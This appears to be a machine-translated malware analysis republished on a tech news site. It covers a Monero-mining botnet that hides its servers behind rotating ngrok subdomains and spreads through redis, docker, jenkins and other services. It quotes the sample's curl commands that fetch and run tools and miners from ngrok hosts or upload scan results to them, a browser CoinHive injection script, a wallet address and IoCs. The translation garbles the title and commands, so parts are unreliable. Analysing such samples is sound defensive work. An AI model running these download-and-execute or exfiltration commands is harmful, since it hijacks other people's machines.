Shulou(Shulou.com)05/31 Report--

How to use ngrok to spread sample mining, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain for you in detail, people with this need can come to learn, I hope you can gain something.

Overview

"the chain cures all kinds of diseases, and the medicine cannot be stopped." Nowadays, all kinds of mining software are springing up one after another, and it is impossible to kill them all, not in this lifetime. Usually we ignore them. However, this mining malicious sample, which uses ngrok to generate a large number of random domain names as Downloader and Report domain names, blocks their domain names and hides the real server address, has successfully attracted our attention.

The main features of the malicious sample are:

Use random domain names that ngrok periodically changes as Downloader and Report domain names.

Take advantage of redis,docker,jenkins,drupal,modx,CouchDB vulnerability to implant xmr mining program to mine mine.

Attempt to scan Ethernet Fong client to steal etheric coins, which is not actually enabled at present.

Attempt to infect the js file on the target device and insert the CoinHive mining script browser to mine the mine.

Dynamically generate mining scripts and scanning scripts.

The mining sample is mainly composed of Scanner script, Miner script and Loader. The Scanner module is responsible for scanning and reporting vulnerability information to Loader. Loader is responsible for implanting Scanner and Miner into vulnerable devices. Miner is in charge of mining.

Ngrok

Figure 1:ngrok working principle

How to use ngrok: first go to ngrok.io to register a service, then start ngrok client locally and transfer the traffic to the private network port. The ngrok client side will get the ngrok sub-domain names randomly assigned by the server, through which you can access the private network resources from the public network. In free mode, ngrok client can have one process, a process can have 4 tunnel, each tunnel will get a subdomain name, and each time you restart client, you can get the subdomain name corresponding to each tunnel.

Domain name survival cycle

To facilitate the visual display of the lifetime of the domain name used, we have plotted the Heatmap of the number of times we have successfully returned the sample from the mining sample in the last 48 hours. It can be seen from the figure that the sample periodically changes the domain name it uses, and the domain name used has a survival time of no more than 12 hours. In fact, from our data, the mining sample first appeared in late June, and the law of domain name switching has always been the same.

Figure 2: domain name lifecycle

Scanner

The IP range to be scanned is generated when it is implanted by Loader. The Report and Downloader domain names are hard-coded in the Scanner script. Specific implementation process:

Download the scanning process using the tool zmap,zgrab,jq

Curl-m 120-fks-o / usr/bin/zmap "hxxp://3a3c559e.ngrok.io/d8/zmap" curl-m 120-fks-o / usr/bin/jq "hxxp://53349e8c.ngrok.io/d8/jq" curl-m 120-fks-o / usr/bin/zgrab "hxxp://e5a22d36.ngrok.io/d8/zgrab"

Download Ethernet Fong client geth scan payload

# curl-m 120-fks-o / tmp/.p8545 "hxxp://cc8ef76b.ngrok.io/d8/p8545" POST / HTTP/1.1 Host:% SJV 8545 User-Agent: geth Accept: * / * Content-Type: application/json Content-Length: 60 {"jsonrpc": "2.0", "method": "eth_accounts", "params": [], "id": 1}

Vulnerability scanning, use zmap scan port to open, and then use zgrab to scan the application layer. Currently, the malicious sample scans port 6379max 2375amp 8080max 5984 to find redis,docker,jenkins,drupal,modx,couchdb services.

# for example, scan redis port PORT= "6379" echo-ne "info\ r\ nquit\ n" > / tmp/rinfoa379f8ca echo "; ${PORT}" > $OUT / usr/bin/zmap-I $IFACE-B 50m-- max-sendto-failures 1000000-c5-o-p $PORT $IPR 2 > > ${LOGF} | zgrab-- senders 100-- port $PORT-- data / tmp/rinfoa379f8ca-- output-file=- 2 > / dev/null | grep 'redis_version' | jq-r .ip > > ${OUT}

Upload scan results

Curl-m120-sk-F result=@$ {_ FILE} "hxxp://cc8ef76b.ngrok.io/z?r= {RIP} & I = {I} & Xerox ${excode}"

Delete trace exit

Miner

The Report,Downloader domain name generated during Loader implantation phase is hard-coded in the Miner script:

Export HOST= "hxxp://608f5b6c.ngrok.io"

Perform the process:

Download and run fc, which is a global flag to distinguish the infection status. If the sample runs successfully, the infection is successful. If the operation fails, an error message is recorded and used to report to Report.

Curl-fks-o $INSTALL/93b689 "$HOST/d8/fc" $INSTALL/93b689'/'> 201e3a252c5e 2 > & 1 & $INSTALL/93b689'[^ $I $^]'> > 201e3a252c5e 2 > & 1 &

Kill a competitor

Generate the old version of your own Report information, including the process name, miner MD5, miner file path. To report to Report.

Kill the old version of yourself.

Download daemon (process management tool) and run nginx (mining machine).

Curl-fks-o "${RIP} d"$HOST/d8/daemon" curl-fks-o dda4512010 "$HOST/d8/nginx" cat dda4512010 | "${RIP} d"

Find out if there are other miner domain names in / etc/hosts, and if so, write "127.0.0.1 localhost" to / etc/hosts to clear the other miner's fast domain name resolution records.

Clear crontab tasks that are not your own

Insert the CoinHive mining script into the js script in the current directory and infect the js file on the broiler. Maybe this is a bug, because the current directory is its working directory and there is no js file under it.

Var js=document.createElement ("script"); js.type= "text/javascript"; js.src= "hxxps://coinhive.com/lib/coinhive.min.js", document.body.appendChild (js), window.msci=setInterval (function () {var e = "CoinHive"; if (window [e]) {clearInterval (window.msci); var n = window [e] .Anonymous Window.__m1 | (window.__m1=new n ("U1EhkTAx8j1IVGH6KkzoHDuwPy42c7vW")) & & _ _ m1.start ()}, 200)

Report the operation information of mining machine

The mining machine runs successfully, reporting the mining machine process ID, the number of IP ID,CPU of the infected device, the vulnerability used by the infected device, and the current user name.

Failure of mine machine operation, report error message, including infection result, old version mine machine operation information (process name, mine machine MD5, running file path), crontab error message, etc.

Mining configuration is as follows: mine pool address: pool.minexmr.com:55555 wallet address: 4AuKPF4vUMcZZywWdrixuAZxaRFt9FPNgcv9v8vBnCtcPkHPxuGqacfPrLeAQWKZpNGTJzxKuKgTCa6LghSCDrEyJ5s7dnW

The current TotalPaid is 69.676550440000 XMR

IoCMD5md5=19e8679be6cfc56a529cf35df2dbece8 uri=hxxp://608f5b6c.ngrok.io/d8/daemon md5=e309354fe7047a5fca3c774a427ae7a2 uri=hxxp://608f5b6c.ngrok.io/d8/fc md5=39fcbe99c2d72006667be9bcc286db4e uri=hxxp://608f5b6c.ngrok.io/d8/nginx md5=510802ce144bb729c3c527d465321168 uri=hxxp://ce0a62ad.ngrok.io/f/serve?l=u&r= {RIP} & curl=1 md5=072922760ec200ccce83ac5ce20c46ca uri=hxxp://69c0c72e.ngrok.io/z?r= {RIP} & Loader IP194.99.105.76 ASAS9009 M247_Ltd 185.183.104.139 AS9009 M247 _ once used by i=2a6da41fcf36d873dde9ed0040fcf99ba59f579c3723bb178ba8a2195a11fb61cb6b669ed0f32fb9bdc891e64613e0caad46642f7a9b68ccea30244b4d0addf6d506be7e2c71c3c3793762e8e2a40117f62f0688cfad660a6f9529d3e17e183d769864ea45294d9dca4712ee73d5733 Ltd 185.242.6.4 AS9009 M247_Ltd 46.166.142.220 AS43350 NForce_Entertainment_B.V. 217.23.3.91 AS49981 WorldStream_B.V. 89.39.107.195 AS49981 WorldStream_B.V. 185.159.157.19 AS59898 AllSafe_Sarl 194.99.105.75 ASAS9009 M247_Ltd 109.201.133.24 AS43350 NForce_Entertainment_B.V. 217.23.3.92 AS49981 WorldStream_B.V . 46.166.142.215 AS43350 NForce_Entertainment_B.V. 89.39.107.192 AS49981 WorldStream_B.V. 109.201.133.22 AS43350 NForce_Entertainment_B.V. 89.39.107.202 AS49981 WorldStream_B.V. 89.39.107.199 AS49981 WorldStream_B.V. 109.201.133.26 AS43350 NForce_Entertainment_B.V. Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.